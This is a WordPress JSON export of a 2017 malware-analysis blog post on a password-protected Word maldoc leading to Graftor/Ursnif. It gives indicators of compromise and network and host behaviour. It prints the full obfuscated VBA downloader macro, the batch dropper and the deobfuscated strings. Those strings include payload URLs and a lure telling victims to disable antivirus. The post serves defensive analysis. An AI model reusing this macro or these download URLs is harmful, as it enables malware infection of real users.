{"id":753,"date":"2017-04-05T12:12:22","date_gmt":"2017-04-05T11:12:22","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=753"},"modified":"2017-04-05T12:26:28","modified_gmt":"2017-04-05T11:26:28","slug":"2017-04-03-malspam-leading-to-graftorursnif","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=753","title":{"rendered":"2017-04-03 Malspam leading to Graftor\/Ursnif"},"content":{"rendered":"

Monday there was a file sent via email to an employee with a maldoc attached to it. The maldoc was encrypted and used the password of 3443 to unlock it. Once you unlocked the document, it asked to enable macros. It is from here that this analysis starts. This infection chain seems very close to the one that Sophos had reported on here in this link<\/a>. Like the test done in the Sophos article, I was not able to get any callback traffic generated on my test VM. <\/p>\n

Based on the Virustotal and Hybrid-Analysis links and the article from Sophos, this is falling under the Graftor\/Ursnif family of malware.<\/p>\n

Like always, for the artifacts from this investigation, please see my repo here<\/a>.<\/p>\n

Indicators of Compromise:
\n=========================
\ntruhlarna-macura.cz:80\/ 95.168.206.199
\nwww.solidaridadsolar.com:80 \/ 134.0.11.204
\naemquality.com:80 \/ 50.62.103.1
\n21.12.44.23 (ICMP)<\/p>\n

Artifacts:
\n==========
\nFile name: 03167.exe
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nFile size: 207KB
\nMD5 hash: 8443bc47a982d6c5761d3182415e48e4
\nVirustotal: http:\/\/virustotal.com\/en\/file\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689\/analysis\/<\/a>
\nFirst detection: 2017-04-03 10:21:40 UTC
\nDetection Ratio: 8 \/ 61
\nMalwr: http:\/\/malwr.com\/analysis\/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA\/ and http:\/\/malwr.com\/analysis\/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100<\/a><\/p>\n

File name: 03167.tmp
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nFile size: 207KB
\nMD5 hash: 0efa064779ccb639a07fc1ae088e04ff
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n

File name: 03167.cmd
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nFile size: 98KB
\nMD5 hash: a27604e68dafb7ceaadd6354d7c82c4a
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n

File name: logo[1].gif
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8LBPK0D0\\logo[1].gif
\nFile size: 207KB
\nMD5 hash: 0efa064779ccb639a07fc1ae088e04ff
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n

File name: fili.exe
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Dawu\\fili.exe
\nFile size: 612KB
\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n

File name: id.dat
\nFile size: 612KB
\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908
\nVirustotal: http:\/\/virustotal.com\/en\/file\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076\/analysis\/<\/a>
\nFirst detection: 2017-04-03 13:57:27 UTC
\nDetection ratio: 36 \/ 61
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100<\/a><\/p>\n

Analysis of Malware:
\n====================
\nAs mentioned above the user received the below email that contained a malicious Word document that was encrypted to get around any sandboxing analysis. <\/p>\n

\"\"<\/a><\/p>\n

Once the Word document is downloaded, the file opened, and macros enabled the Word doc displays a message stating that it is checking the status of the SSL certificate for a few seconds. After that we get the same pop-up that Sophos mentioned – that the file is corrupted and cannot be opened. Once you click on “OK,” the Word document is closed. Now for the average user, they would not think anything of this, but it is what happens after a minute or so that gives a hint of something nefarious going on stemming from this Word document. There is a Windows popup stating that the process “0484A.exe has stopped working” as seen below.<\/p>\n

\"\"<\/a><\/p>\n

Starting from the network side of this infection, once the Word document is run, there is a call to the site truhlarna-macura[.]cz requesting a GIF file. <\/p>\n

\"\"<\/a><\/p>\n

Looking at the request, you can see that the supposed GIF file is 207114 bytes, which seems to match up to the actual GIF file size, and some of the other binary files that are dropped on to the system (03167.exe\/03167.tmp). <\/p>\n

Next we see an old trick to help defeat sandboxing techniques – a PING request to 21.12.44.23. This IP address belong to DoD based on Robtex: http:\/\/www.robtex.com\/?ip=21.12.44.23&whois=1.<\/p>\n

\r\nNetRange:\t21.0.0.0 - 21.255.255.255\r\nCIDR:\t21.0.0.0\/8\r\nNetName:\tDNIC-SNET-021\r\nNetHandle:\tNET-21-0-0-0-1\r\nParent:\t()\r\nNetType:\tDirect Allocation\r\nOriginAS:\t\r\nOrganization:\tDoD Network Information Center (DNIC)\r\nRegDate:\t1991-07-01\r\nUpdated:\t2009-06-19\r\nRef:\thttp:\/\/whois.arin.net\/rest\/net\/NET-21-0-0-0-1<\/pre>\n
We also see a request for Github too, but I am not sure what transpired here since this is over SSL. <\/p>\n
\"\"<\/a><\/p>\n
We then see a call to the site www[.]solidaridadsolar[.]com which must have been cleaned up by the time I ran this on my test VM (and could explain part of the reason why nothing else happened on the VM).<\/p>\n
\"\"<\/a><\/p>\n
And then lastly a call to aemquality[.]com to get a file called “id.dat.”<\/p>\n
\"\"<\/a><\/p>\n
From the host side of things, this was a pretty straight forward infection. Once the Word document is run, the VB script is executed and we can assume that it makes the request to download the malicious “GIF” file. We also see that Word creates a new CMD process which in turn creates a batch file called “03137.cmd.” While the GIF file is striping out the malicious binary file, the batch file is doing a PING to the IP address of 21.12.44.23 and also to execute the 03137.exe binary.<\/p>\n
\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 > NUL\r\nstart C:\\Users\\Bill\\AppData\\Local\\Temp\03167.exe<\/pre>\n
Once the 03137.exe binary is started, it starts going through the system looking at various things on the filesystem and within the registry (with a heavy emphasis when looking at registry keys related to certificates). It then creates the file called “fili.exe” and it starts to execute that file. This file, like the 03137.exe file looks at various things on the system (filesystem and registry) and after a bit terminates causing a system fault (the error message that pops up after a minute once the Word document has been closed). From there everything shuts down and no further activity is seen.<\/p>\n
Since I was not able to get much further from here, I asked one of my colleagues to take a look and see if he was able to get it to go further. Thankfully he was able to and also shared with me an interesting tip that I was not aware of – saving the encrypted Word document as a new file and deleting the password from it as seen below.<\/p>\n
\"\"<\/a><\/p>\n
Once I did that, I was able to get to the script using OfficeMalDoc and extracting out the file that (granted you can also just extract the files out from the Word doc since it is another example of an archive).<\/p>\n
Below is the VBA script from the Word document.<\/p>\n
\r\nAttribute VB_Name = "ThisDocument"\r\nAttribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = True\r\n#If VBA7 And Win64 Then\r\nPrivate Declare PtrSafe Function uhodixi Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong\r\nPrivate Declare PtrSafe Function ocabype Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare PtrSafe Function hogezij Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long\r\nPrivate Declare PtrSafe Function egawomy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#Else\r\nPrivate Declare Function uhodixi Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long\r\nPrivate Declare Function ocabype Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare Function hogezij Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long\r\nPrivate Declare Function egawomy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\nSub Document_Open()\r\n\r\nDim pupujoh As String\r\nDim neqizuv As String\r\nDim asajuko As Long\r\nDim xeryxeb As Long\r\nDim etopedo As Integer\r\nDim yqaluqe() As Byte\r\nDim qilogyb As Object\r\nDim alugumi As Object\r\n      \r\n#If Win64 Then\r\nDim fysisin As LongLong\r\n#Else\r\nDim fysisin As Long\r\n#End If\r\n\r\nActiveDocument.Content.Delete\r\nActiveDocument.PageSetup.LeftMargin = 240\r\nActiveDocument.PageSetup.TopMargin = 100\r\n\r\nSet myRange = ActiveDocument.Content\r\n\r\nWith myRange.Font\r\n .Name = acuzamu("P~})sbs")\r\n .Size = 14\r\nEnd With\r\nActiveDocument.Range.Text = acuzamu("ZU~5O-11g-5~}h;Y;5sh~""") & vbLf & acuzamu("-----iR~s<~-Js;h""""""")\r\n\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\n\r\npupujoh = esecana\r\nasajuko = egawomy(0, acuzamu("UhhWQHHh}0URs}bs*8s50}s""5!H;8vHR(v(""v;Y"), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\n\r\nIf asajuko <> 0 And xeryxeb < 183927 Then\r\nasajuko = egawomy(0, acuzamu("UhhWQHHv0s8sh~b""5(8HW}0~dsHR(v(""v;Y"), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf asajuko <> 0 And xeryxeb < 175274 Then\r\nasajuko = egawomy(0, acuzamu("UhhWQHHW}~Y8sF0s""5(8Hf50<0);HR(v(""v;Y"), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf xeryxeb < 179218 Then\r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu("B(-;bh~}b~h-s55~<<""-?0}b-(YY-sbq-Y;}~JsRR-(}-sbh;*N;}0<-<(YhJs}~-sb)-h}q-svs;b"""), vbCritical, acuzamu("I}}(}")\r\nApplication.Quit SaveChanges:=0\r\nExit Sub\r\nEnd If\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nReDim yqaluqe(0 To LOF(etopedo) - 1)\r\nGet #etopedo, , yqaluqe()\r\nClose #etopedo\r\n  \r\nCall ejynebe(yqaluqe())\r\n\r\npupujoh = Left(pupujoh, Len(pupujoh) - 3)\r\npupujoh = pupujoh & acuzamu("~ ~")\r\n\r\nneqizuv = Left(pupujoh, Len(pupujoh) - 3)\r\nneqizuv = neqizuv & acuzamu("58)")\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nPut #etopedo, , yqaluqe()\r\nClose #etopedo\r\n \r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu("?U~-Y;R~-;<-5(}}0Wh~)-sb)-5sbb(h-d~-(W~b~)"), vbCritical, acuzamu("I}}(}")\r\n\r\nSet qilogyb = CreateObject(acuzamu("15};Wh;bv"",;R~1q<h~8[dx~5h"))\r\nSet alugumi = qilogyb.CreateTextFile(neqizuv)\r\nalugumi.WriteLine acuzamu("u~5U(-(YY")\r\nalugumi.WriteLine acuzamu("W;bv-G2""2G""@@""G=-*b-2-*J-G```-'-B6g")\r\nalugumi.WriteLine acuzamu("<hs}h-") & pupujoh\r\nalugumi.Close\r\n\r\nfysisin = uhodixi(0, acuzamu("[W~b"), neqizuv, 0, 0, 6)\r\nApplication.Quit SaveChanges:=0\r\nEnd Sub\r\n\r\n\r\nPublic Function esecana() As String\r\n  Dim ezytate As String * 312\r\n  Dim jymyryq As String * 618\r\n  Dim ivecaco As Long\r\n  Dim ymohoba As String\r\n  \r\n  ivecaco = ocabype(312, ezytate)\r\n  If (ivecaco > 0 And ivecaco < 312) Then\r\n    ivecaco = hogezij(ezytate, 0, 0, jymyryq)\r\n    If ivecaco <> 0 Then\r\n        ymohoba = Left$(jymyryq, InStr(jymyryq, vbNullChar) - 1)\r\n    End If\r\n    esecana = ymohoba\r\n  End If\r\nEnd Function\r\n\r\nPublic Sub ejynebe(yqaluqe() As Byte)\r\n  Dim eqoneji As Long\r\n  Dim esyjato As Long\r\n  Dim norixec As Long\r\n  Dim ugagoqo(256) As Byte\r\n  Dim zynebit As Long\r\n  Dim yzetyso As Long\r\n  \r\n   \r\n  esyjato = UBound(yqaluqe) + 1\r\n  \r\n  For eqoneji = 10 To 265\r\n    ugagoqo(eqoneji - 10) = yqaluqe(eqoneji)\r\n  Next\r\n  \r\n  zynebit = UBound(ugagoqo) + 1\r\n  \r\n  yzetyso = 0\r\n  For eqoneji = 266 To (esyjato - 1)\r\n    yqaluqe(eqoneji - 266) = yqaluqe(eqoneji) Xor ugagoqo(yzetyso)\r\n    yzetyso = yzetyso + 1\r\n    \r\n    If yzetyso = (zynebit - 1) Then\r\n        yzetyso = 0\r\n    End If\r\n  Next\r\n  \r\n  ReDim Preserve yqaluqe(esyjato - 267)\r\n  \r\nEnd Sub\r\n\r\nPublic Function acuzamu(ByVal moluhyp As String) As String\r\n  Dim begozat(256)\r\n  Dim abuvuba As String\r\n  Dim ijuhoqe As Long\r\n  Dim korupaj As String\r\n \r\nabuvuba = "xz.~^7;>od-DF )}uS1[=cU`mGWis3MT4{N%9Zq2\/Ew(&+vkV:l\\!hKp8fCOAR6?0|nYbI_LtPB'H<Q$Xy""aJ@g#j5],*re"\r\n  For ijuhoqe = 1 To Len(abuvuba)\r\n  begozat(ijuhoqe + 31) = Mid(abuvuba, ijuhoqe, 1)\r\n  Next ijuhoqe\r\n  \r\n  For ijuhoqe = 1 To Len(moluhyp)\r\n  korupaj = Mid(moluhyp, ijuhoqe, 1)\r\n  acuzamu = acuzamu & begozat(Asc(korupaj))\r\n  Next ijuhoqe\r\nEnd Function<\/pre>\n
Looking at the script, it looks like the decryption function is the acuzamu function since we see that function being called several times throughout the script. Unfortunately I was not able to get the strings deobfuscated from the script, but my colleague was able to. Here is what he found when deobfuscating the script:<\/p>\n
\r\nVerdana\r\nCheck SSL certificate.\r\n     Please wait...\r\nhttp:\/\/truhlarna-macura.cz\/img\/logo.gif\r\nhttp:\/\/guamaten.com\/prueba\/logo.gif\r\nhttp:\/\/prefmaqua.com\/_cusudi\/logo.gif\r\nNo internet access. Turn off any firewall or anti-virus software and try again.\r\nThe file is corrupted and cannot be opened\r\nScripting.FileSystemObject\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 > NUL\r\nstart\r\nScripting.FileSystemObject<\/pre>\n
He also noted that the GIF, once decoded to an executable, makes a network call to some well known sites such as instagram, github, and linkedin. We are assuming that this is another network connectivity check. Lastly, he also noted that the file “id.dat”\u00a0was another executable binary as well which makes sense since it, and the file called “fili.exe” have the same MD5 hash. I am assuming that this file, like the GIF, is being converted into a binary (in this case via the 03167.exe file\/process). When I was writing this up yesterday there was nothing listed for the id.dat file in Hybrid Analysis or in Virustotal. This morning when reading his notes, he noted that there were now hits for the MD5 (which has been updated above for id.dat).<\/p>\n","protected":false},"excerpt":{"rendered":"
Monday there was a file sent via email to an employee with a maldoc attached to it. The maldoc was encrypted and used the password of 3443 to unlock it. Once you unlocked the document, it asked to enable macros. It is from here that this analysis starts. This infection chain seems very close to the one that Sophos had reported on here in this link. Like the test done in the Sophos article, I was not able to get any callback traffic generated on my test VM. Based on the Virustotal and Hybrid-Analysis links and the article from Sophos,…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-753","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=753"}],"version-history":[{"count":7,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753\/revisions"}],"predecessor-version":[{"id":769,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/753\/revisions\/769"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}